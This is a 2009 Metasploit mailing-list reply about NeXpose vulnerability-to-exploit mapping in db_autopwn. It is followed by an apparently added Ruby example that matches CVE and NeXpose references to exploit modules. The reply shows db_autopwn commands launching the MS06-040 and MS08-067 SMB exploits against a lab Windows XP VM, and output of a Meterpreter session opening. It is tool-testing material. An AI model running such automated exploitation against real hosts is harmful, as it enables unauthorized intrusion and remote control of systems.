Metasploit mailing list archives

Re: db_autopwn & NeXpose


From: John Sawyer <jsawyer () ufl edu>
Date: Thu, 3 Dec 2009 11:22:17 -0500

On Dec 2, 2009, at 8:36 PM, HD Moore wrote:

On Wed, 2009-12-02 at 16:28 -0500, John Sawyer wrote:
Great work on the new updates. I took the NeXpose plugin for a test
drive today and everything seems to be working as expected except that
db_autopwn is not mapping the CVE-2006-3439 vulnerability to the
exploit for MS06-040. I have a VM with Windows XP SP2 that is
definitely vulnerable. I confirmed it is vulnerable by exploiting it.

Is there something I'm missing or is there a CVE name mismatch when
PWN_XREF does the lookup?

All fixed, svn update :-)

This update also improves db_autopwn usability quite a bit.

HD, you're the man! I saw you made multiple changes (nexpose.rb & db.rb) since your e-mail last night and this morning. Around 1am, I got the first chunk of output below, and this morning after another update, I get even more accurate results.

I know I probably shouldn't use the autopwn at the end since it is trying both exploits, but it's there so I couldn't help myself. It worked without a problem. Very sweet!

Your turnaround time is amazing. Keep up the awesome work.

-jhs



msf > db_autopwn -t -x
[*] Analysis completed in 3 seconds (3 vulns / 1761 refs)
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*] 172.16.1.163:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] ================================================================================
[*]
[*]



msf > db_autopwn -e -r -t -x
[*] Analysis completed in 3 seconds (4 vulns / 1763 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*] 172.16.1.163:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] 172.16.1.163:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 172.16.1.163:445...
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 172.16.1.163:445...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.1.12:31783 -> 172.16.1.163:1036)
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

  Id  Description  Tunnel                                    Via
  --  -----------  ------                                    ---
  1   Meterpreter  192.168.1.12:31783 -> 172.16.1.163:1036   windows/smb/ms08_067_netapi

[*] ================================================================================
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
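The thread above turns on db_autopwn's cross-reference step: the vulnerability references imported from NeXpose (CVE ids, and NeXpose's own vulnerability ids such as the dcerpc-ms-netapi-netpathcanonicalize-dos entry) are looked up against the references each exploit module declares, and a naming mismatch on either side means the module is never selected. The Ruby below is an added example, not code from Metasploit or from the nexpose.rb/db.rb changes discussed, that implements that kind of lookup over constructed sample data modelled on the listing above. The MSB references, the port-135 finding and the ms03_026_dcom entry are assumptions added for illustration, and normalize_ref, build_xref and match_exploits are hypothetical names, not Metasploit's.

```ruby
# Constructed sample: findings as a scanner import would hand them over,
# one (host, port, references) record per finding. The third record has
# sloppy casing and trailing whitespace on purpose, to show why the
# references have to be normalised before the lookup.
VULNS = [
  { host: '172.16.1.163', port: 445, refs: ['CVE-2006-3439'] },
  { host: '172.16.1.163', port: 445, refs: ['NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos'] },
  { host: '172.16.1.163', port: 135, refs: ['cve-2003-0352 '] },  # assumption, for illustration
].freeze

# Constructed sample: exploit modules and the [type, id] reference pairs
# they declare. The MSB pairs and the ms03_026_dcom entry are assumptions.
MODULES = {
  'exploit/windows/smb/ms06_040_netapi' => [['CVE', '2006-3439'], ['MSB', 'MS06-040']],
  'exploit/windows/smb/ms08_067_netapi' => [['CVE', '2008-4250'], ['MSB', 'MS08-067'],
                                            ['NEXPOSE', 'dcerpc-ms-netapi-netpathcanonicalize-dos']],
  'exploit/windows/dcerpc/ms03_026_dcom' => [['CVE', '2003-0352'], ['MSB', 'MS03-026']],
}.freeze

# Canonical key for a reference string: "TYPE-id" with the type uppercased,
# surrounding whitespace dropped, and CVE ids uppercased. Only the first '-'
# separates type from id, so NeXpose ids that themselves contain hyphens
# survive intact. Returns nil for strings that carry no type prefix.
def normalize_ref(ref)
  type, id = ref.to_s.strip.split('-', 2)
  return nil if type.nil? || id.nil? || id.empty?
  type = type.upcase
  id = id.strip
  id = id.upcase if type == 'CVE'
  "#{type}-#{id}"
end

# Invert the module table into reference-key => [module names], so that a
# finding's references can be resolved with a single hash lookup each.
def build_xref(modules)
  xref = {}
  modules.each do |name, refs|
    refs.each do |type, id|
      key = normalize_ref("#{type}-#{id}")
      next if key.nil?
      (xref[key] ||= []) << name unless (xref[key] || []).include?(name)
    end
  end
  xref
end

# Resolve every finding against the cross-reference table. Returns
# "host:port" => [[module name, matched reference key], ...], with duplicates
# collapsed, which is the information the "Matching Exploit Modules" listing
# prints one line per entry.
def match_exploits(vulns, modules)
  xref = build_xref(modules)
  matches = Hash.new { |h, k| h[k] = [] }
  vulns.each do |v|
    target = "#{v[:host]}:#{v[:port]}"
    v[:refs].each do |ref|
      key = normalize_ref(ref)
      next if key.nil?
      xref.fetch(key, []).each do |mod|
        entry = [mod, key]
        matches[target] << entry unless matches[target].include?(entry)
      end
    end
  end
  matches
end

# Render the matches in the same shape as the db_autopwn listing.
def format_matches(matches)
  matches.flat_map do |target, entries|
    entries.map { |mod, key| "#{target} #{mod} (#{key})" }
  end
end

if __FILE__ == $PROGRAM_NAME
  puts format_matches(match_exploits(VULNS, MODULES))
end
```

Running it lists the two port-445 matches from the thread plus the constructed port-135 one; the point of normalize_ref is that 'cve-2003-0352 ' still resolves, which is the class of mismatch the original report suspected in the PWN_XREF lookup.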